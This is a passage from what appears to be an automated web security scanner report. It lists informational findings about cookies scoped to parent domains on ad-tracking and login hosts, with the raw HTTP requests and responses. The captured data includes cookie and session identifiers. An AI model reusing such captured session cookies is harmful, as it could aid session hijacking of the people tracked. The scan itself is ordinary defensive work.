Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=4&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Domain&dtmc_product_id=TTN%3A%20Domains%3A%20Search%3A%20Taken&dtmc_domain_name=xss.com&dtm_items=&dtmc_domain_status=TAKEN&dtmc_domain_variations=xss.la&dtmc_source=WWW000000000W&dtmc_ref=http%3A//www.register.com/&dtmc_loc=http%3A//www.register.com/domain/searchresults.rcmx%3Fwebmetrics%3Dnull%26searchOrigin%3Dhomepage%26domain%3Dxss%26selectedTLDs%3D.com%26x%3D0%26y%3D0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 90
Content-Type: image/gif
Set-Cookie: ZFFAbh=977B826,20|121_977#365;expires=Fri, 02 Dec 2011 21:40:25 GMT;domain=.zedo.com;path=/;
Set-Cookie: ZFFBbh=977B826,20|121_977#0;expires=Sun, 02 Sep 2012 21:40:25 GMT;domain=.zedo.com;path=/;
ETag: "3a9d58c-de5c-4a8e0f9fb9dc0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=24701
Expires: Sun, 04 Sep 2011 04:32:06 GMT
Date: Sat, 03 Sep 2011 21:40:25 GMT
Connection: close

GIF89a.............!.......,...........D..;

GIF89a.............!.......,...........D..;

10.28. http://d7.zedo.com/img/bh.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/img/bh.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

FFAbh=950B809,20|3_2#392Z10_1#365:305,20|458_1#371Z145_2#371;expires=Fri, 02 Dec 2011 21:56:38 GMT;domain=.zedo.com;path=/;
FFBbh=962B809,20|3_2#30Z10_1#0:305,20|145_2#3Z458_1#0;expires=Sun, 02 Sep 2012 21:56:38 GMT;domain=.zedo.com;path=/;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/bh.gif?n=809&g=20&a=3&s=1&t=i HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=1&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Home&dtmc_product_id=TTN%3A%20Home&dtmc_domain_name=&dtm_items=&dtmc_domain_status=&dtmc_domain_variations=&dtmc_source=SEO000000000W&dtmc_ref=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&dtmc_loc=http%3A//www.register.com/
Cookie: FFgeo=5386156; ZFFBbh=955B826,20|633_962#7Z695_955#5Z332_950#4; ZEDOIDA=mLs5ThcyantsGCRD8ld6EMRU~080311; ZFFAbh=946B826,20|633_962#381Z695_955#374Z332_950#369; FFAbh=950B809,20|10_1#365:305,20|458_1#371Z145_2#371; FFBbh=962B305,20|145_2#3Z458_1#0:809,20|10_1#0; ZEDOIDX=5

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 47
Content-Type: image/gif
Set-Cookie: FFAbh=950B809,20|3_2#392Z10_1#365:305,20|458_1#371Z145_2#371;expires=Fri, 02 Dec 2011 21:56:38 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFBbh=962B809,20|3_2#30Z10_1#0:305,20|145_2#3Z458_1#0;expires=Sun, 02 Sep 2012 21:56:38 GMT;domain=.zedo.com;path=/;
ETag: "1b6340a-de5c-4a8e0f9fb9dc0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=14707
Expires: Sun, 04 Sep 2011 02:01:45 GMT
Date: Sat, 03 Sep 2011 21:56:38 GMT
Connection: close

GIF89a.............!.......,...........D..;

10.29. http://ds.addthis.com/red/psi/sites/vasco.com/p.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ds.addthis.com
Path:	/red/psi/sites/vasco.com/p.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

di=%7B%7D..1315071141.10R|1315071142.1WV|1315071141.1FE|1314983342.1OD|1315071141.60|1315071141.1EY; Domain=.addthis.com; Expires=Mon, 02-Sep-2013 17:32:21 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Length: 157
Content-Type: text/html
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sat, 03 Sep 2011 17:32:22 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 03 Oct 2011 17:32:22 GMT; Path=/
Set-Cookie: di=%7B%7D..1315071141.10R|1315071142.1WV|1315071141.1FE|1314983342.1OD|1315071141.60|1315071141.1EY; Domain=.addthis.com; Expires=Mon, 02-Sep-2013 17:32:21 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sat, 03 Sep 2011 17:32:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 03 Sep 2011 17:32:22 GMT
Connection: close
Vary: Accept-Encoding

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (500 Internal Server Error) has occured in response to this request.
</BODY>
</HTML>

10.30. http://ib.adnxs.com/getuid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/getuid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uuid2=6422714091563403120; path=/; expires=Fri, 02-Dec-2011 17:34:45 GMT; domain=.adnxs.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuid?http%3A%2F%2Fcf.addthis.com%2Fred%2Fusync%3Fpid%3D6%26puid%3D%24UID HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh52.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid2=6422714091563403120; icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG10Qcvjr/?0P(*AuB-u**g1:XICjmEi'/29uJ21AU+]TP1m(hR)h523xzi'/4ZgI!6aZWx4#ZcNMkm2UReP=`CLdA!r):#o^)TD!vV^w#5O?0/><0pV3eGELw=b5$yyfs8q9<J.UiYhE029Q'Zi)hc5#t:

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 04-Sep-2011 17:34:45 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Fri, 02-Dec-2011 17:34:45 GMT; domain=.adnxs.com; HttpOnly
Location: http://cf.addthis.com/red/usync?pid=6&puid=6422714091563403120
Date: Sat, 03 Sep 2011 17:34:45 GMT
Content-Length: 0

10.31. http://ib.adnxs.com/seg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/seg

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=6422714091563403120; path=/; expires=Fri, 02-Dec-2011 21:31:05 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG5`$cvjr/?0P(*AuB-u**g1:XIF)WEi'/29uJ21V)`B-9`/7Ko9MUt3xzi'/4ZgI!6aZWx4#ZcXfR=T@A^0Y`4jmC=WN@m!nW>/7tnkB5j%8zT+4q#daaX4Tjg6O#PQRq%^).H=M=x0Xe3#2vn<%BNdgF1+j)nl2fp%0; path=/; expires=Fri, 02-Dec-2011 21:31:05 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?add=165828&t=2 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/?subcats=Y&status=A&pshort=Y&pfull=Y&pname=Y&pkeywords=Y&search_performed=Y&cid=0&q=xss&x=0&y=0&dispatch=products.search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG10Qcvjr/?0P(*AuB-u**g1:XICjmEi'/29uJ21V.fsQSr=z6NGgptu>0_YXw_T%?9*a5p4!1-waB6<#uuy!Q#lx*XEB@`D:dkd7>T]xMWu7a9T1Y1.^NXLlK839uon7j94%gch60)-@(Z_[!1jn1vzCbx; sess=1; uuid2=6422714091563403120

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 04-Sep-2011 21:31:05 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Fri, 02-Dec-2011 21:31:05 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG5`$cvjr/?0P(*AuB-u**g1:XIF)WEi'/29uJ21V)`B-9`/7Ko9MUt3xzi'/4ZgI!6aZWx4#ZcXfR=T@A^0Y`4jmC=WN@m!nW>/7tnkB5j%8zT+4q#daaX4Tjg6O#PQRq%^).H=M=x0Xe3#2vn<%BNdgF1+j)nl2fp%0; path=/; expires=Fri, 02-Dec-2011 21:31:05 GMT; domain=.adnxs.com; HttpOnly
Location: http://cm.g.doubleclick.net/pixel?nid=appnexus1
Date: Sat, 03 Sep 2011 21:31:05 GMT
Content-Length: 0

10.32. http://ib.adnxs.com/setuid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/setuid

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=6422714091563403120; path=/; expires=Fri, 02-Dec-2011 21:33:40 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG7*@E:3F.0s]#%2L_'x%SEV/hnK7#!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SoJ1?kmIqrI`B1!pj[=8$^@U1YIFBG7*NsKA-5?XJ>2v6N)if.pXdfOB!(4(%Pq$T60KmpWC[?NT!^`u7i*QgR(K-EF4/<<!tv0qoKKPh=r*T>2(K$r!f#D(i; path=/; expires=Fri, 02-Dec-2011 21:33:40 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /setuid?entity=34&code=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=1&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Home&dtmc_product_id=TTN%3A%20Home&dtmc_domain_name=&dtm_items=&dtmc_domain_status=&dtmc_domain_variations=&dtmc_source=WWW000000000W&dtmc_ref=&dtmc_loc=http%3A//www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG10Qcvjr/?0P(*AuB-u**g1:XICjmEi'/29uJ21AU+]TP1m(hR)h523xzi'/4ZgI!6aZWx4#ZcNMkm2UReP=`CLdA!r):#o^)TD!vV^w#5O?0/><0pV3eGELw=b5$yyfs8q9<J.UiYhE029Q'Zi)hc5#t:; sess=1; uuid2=6422714091563403120

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 04-Sep-2011 21:33:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Fri, 02-Dec-2011 21:33:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7*@E:3F.0s]#%2L_'x%SEV/hnK7#!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SoJ1?kmIqrI`B1!pj[=8$^@U1YIFBG7*NsKA-5?XJ>2v6N)if.pXdfOB!(4(%Pq$T60KmpWC[?NT!^`u7i*QgR(K-EF4/<<!tv0qoKKPh=r*T>2(K$r!f#D(i; path=/; expires=Fri, 02-Dec-2011 21:33:40 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Sat, 03 Sep 2011 21:33:40 GMT

GIF89a.............!.......,........@..L..;

10.33. http://id.google.com/verify/EAAAAB18MDCNmAWnZ6ZMKxFbyXM.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://id.google.com
Path:	/verify/EAAAAB18MDCNmAWnZ6ZMKxFbyXM.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

NID=50=weQTGvlcDANTxV5wF-7ErWL28T_eIde2eHArK6Ro0Zy54tkidlIV7dmvnTL0c6xSXtweleFZDrG22uhTYX0LPoqeazjheLUerXqIXctalXVtgPQlJij9RupAr8rvIdFS; expires=Sun, 04-Mar-2012 21:29:07 GMT; path=/; domain=.google.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAB18MDCNmAWnZ6ZMKxFbyXM.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/blank.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=50=u5vZn_NDJXw_46xb3szsC8KHo7mSQ9vRO8iZmFjxYw=YsUbv9G_3-MoPapq; PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=dYdXb1ScZWRJMvBrNEHDfLjfOocGh7bNH6BGA3vRVqKYi3SPaS4s8VflEEZyzxRJp0RFQHbwIFv7qAsJNvrMyJFPuL9b0_3fjdGh0Mx_82XLAISmwar_I3OOxUz-5M-7

Response

HTTP/1.1 200 OK
Set-Cookie: NID=50=weQTGvlcDANTxV5wF-7ErWL28T_eIde2eHArK6Ro0Zy54tkidlIV7dmvnTL0c6xSXtweleFZDrG22uhTYX0LPoqeazjheLUerXqIXctalXVtgPQlJij9RupAr8rvIdFS; expires=Sun, 04-Mar-2012 21:29:07 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Sat, 03 Sep 2011 21:29:07 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

10.34. http://id.google.com/verify/EAAAADMsrH8QTeh7gqteYecpwnc.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://id.google.com
Path:	/verify/EAAAADMsrH8QTeh7gqteYecpwnc.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

NID=50=dYdXb1ScZWRJMvBrNEHDfLjfOocGh7bNH6BGA3vRVqKYi3SPaS4s8VflEEZyzxRJp0RFQHbwIFv7qAsJNvrMyJFPuL9b0_3fjdGh0Mx_82XLAISmwar_I3OOxUz-5M-7; expires=Sun, 04-Mar-2012 15:05:05 GMT; path=/; domain=.google.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAADMsrH8QTeh7gqteYecpwnc.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=compression+dotnetnuke
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=50=gYkfLrkEFRObhJ_AMsvalPNTB0r00AJPRsl-2PCVwA=MlhIz5-TO3pmQU2Z; PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=aYJjaoJUNshldk3FUs-vgsnQPJuDrjBt3LzHNFQ3N3bLmMufnkOZ7iX2MROGgKXHYJfo8-7QDL4Tqk2kAaYx2lrsnOlscEXcdgi_FMD_BsfBB0Tnyn77h3FbX1c9opy9

Response

HTTP/1.1 200 OK
Set-Cookie: NID=50=dYdXb1ScZWRJMvBrNEHDfLjfOocGh7bNH6BGA3vRVqKYi3SPaS4s8VflEEZyzxRJp0RFQHbwIFv7qAsJNvrMyJFPuL9b0_3fjdGh0Mx_82XLAISmwar_I3OOxUz-5M-7; expires=Sun, 04-Mar-2012 15:05:05 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Sat, 03 Sep 2011 15:05:05 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

10.35. http://id.google.com/verify/EAAAALzxzy-p1oHxNaVBpSOT2kM.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://id.google.com
Path:	/verify/EAAAALzxzy-p1oHxNaVBpSOT2kM.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SNID=50=u5vZn_NDJXw_46xb3szsC8KHo7mSQ9vRO8iZmFjxYw=YsUbv9G_3-MoPapq; expires=Sun, 04-Mar-2012 21:28:32 GMT; path=/verify; domain=.google.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAALzxzy-p1oHxNaVBpSOT2kM.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ssl+certificates
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=50=gYkfLrkEFRObhJ_AMsvalPNTB0r00AJPRsl-2PCVwA=MlhIz5-TO3pmQU2Z; PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=dYdXb1ScZWRJMvBrNEHDfLjfOocGh7bNH6BGA3vRVqKYi3SPaS4s8VflEEZyzxRJp0RFQHbwIFv7qAsJNvrMyJFPuL9b0_3fjdGh0Mx_82XLAISmwar_I3OOxUz-5M-7

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=50=u5vZn_NDJXw_46xb3szsC8KHo7mSQ9vRO8iZmFjxYw=YsUbv9G_3-MoPapq; expires=Sun, 04-Mar-2012 21:28:32 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Sat, 03 Sep 2011 21:28:32 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

10.36. http://idcs.interclick.com/Segment.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://idcs.interclick.com
Path:	/Segment.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

sgm=12290=734380&7435=734382; domain=.interclick.com; expires=Fri, 03-Sep-2021 21:34:02 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=46b8b784-19e0-4400-8cdb-f6284ddc3d9a HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=1&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Home&dtmc_product_id=TTN%3A%20Home&dtmc_domain_name=&dtm_items=&dtmc_domain_status=&dtmc_domain_variations=&dtmc_source=WWW000000000W&dtmc_ref=&dtmc_loc=http%3A//www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=ef156cf5-d9a2-4704-9dc3-362f08c1bcb4; sgm=12290=734380

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=12290=734380&7435=734382; domain=.interclick.com; expires=Fri, 03-Sep-2021 21:34:02 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sat, 03 Sep 2011 21:34:02 GMT

GIF89a.............!.......,...........D..;

10.37. https://idp.godaddy.com/login.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://idp.godaddy.com
Path:	/login.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:30:45 GMT; path=/
flag1=cflag=us; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:30:45 GMT; path=/
traffic=cookies=1&referrer=http://www.godaddy.com/affiliates/affiliate-program.aspx&sitename=www.godaddy.com&page=/shared/video/videos.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=22398&show_vid=affiliatesproductoverview&pagetype=affiliate&callback=popUpFill&targetDivId=quickTourDiv&popUpFill=jsonp1315095995209&_=1315096014458%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=ca8f10ab-5a85-4bac-9b43-0ef09fae1617&referringdomain=&split=13; domain=godaddy.com; path=/
traffic=cookies=1&referrer=http://www.godaddy.com/affiliates/affiliate-program.aspx&sitename=www.godaddy.com&page=/shared/video/videos.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=22398&show_vid=affiliatesproductoverview&pagetype=affiliate&callback=popUpFill&targetDivId=quickTourDiv&popUpFill=jsonp1315095995209&_=1315096014458%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=ca8f10ab-5a85-4bac-9b43-0ef09fae1617&referringdomain=&split=13; domain=godaddy.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.aspx?SPKey=GDMYA-M1PWMYAWEB006&redirect=true&myaurl=%2fdefault.aspx HTTP/1.1
Host: idp.godaddy.com
Connection: keep-alive
Referer: https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB109&target=http%3A%2F%2Fwww.godaddy.com%2Fssl%2Fssl-certificates.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; domainYardVal=%2D1; serverVersion=A; preferences1=_sid=yishkaeegbnbqewgxixgkfpfeekbejsf&dataCenterCode=US&gdshop_currencyType=USD; BlueLithium_ssl=hbuftbbciczbydeibifgffggtihijizc; ASP.NET_SessionId=pwylm3umzkrcsc3bnf5ymbnz; pathway=4f057259-4645-4223-96aa-98d6262a1c68; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=3; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; adc1=US; currency1=potableSourceStr=USD; traffic=; ShopperId1=miaasiuadhnegiagkeyasfgdujffpbkb

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 00:30:45 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: https://mya.godaddy.com/login_redirect.aspx?idpinfo=none&SPKey=GDMYA-M1PWMYAWEB006&myaurl=%2fdefault.aspx
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:30:45 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:30:45 GMT; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/affiliates/affiliate-program.aspx&sitename=www.godaddy.com&page=/shared/video/videos.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=22398&show_vid=affiliatesproductoverview&pagetype=affiliate&callback=popUpFill&targetDivId=quickTourDiv&popUpFill=jsonp1315095995209&_=1315096014458%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=ca8f10ab-5a85-4bac-9b43-0ef09fae1617&referringdomain=&split=13; domain=godaddy.com; path=/
Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/affiliates/affiliate-program.aspx&sitename=www.godaddy.com&page=/shared/video/videos.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=22398&show_vid=affiliatesproductoverview&pagetype=affiliate&callback=popUpFill&targetDivId=quickTourDiv&popUpFill=jsonp1315095995209&_=1315096014458%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=ca8f10ab-5a85-4bac-9b43-0ef09fae1617&referringdomain=&split=13; domain=godaddy.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 230

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://mya.godaddy.com/login_redirect.aspx?idpinfo=none&SPKey=GDMYA-M1PWMYAWEB006&myaurl=%2fdefault.aspx">he
...[SNIP]...

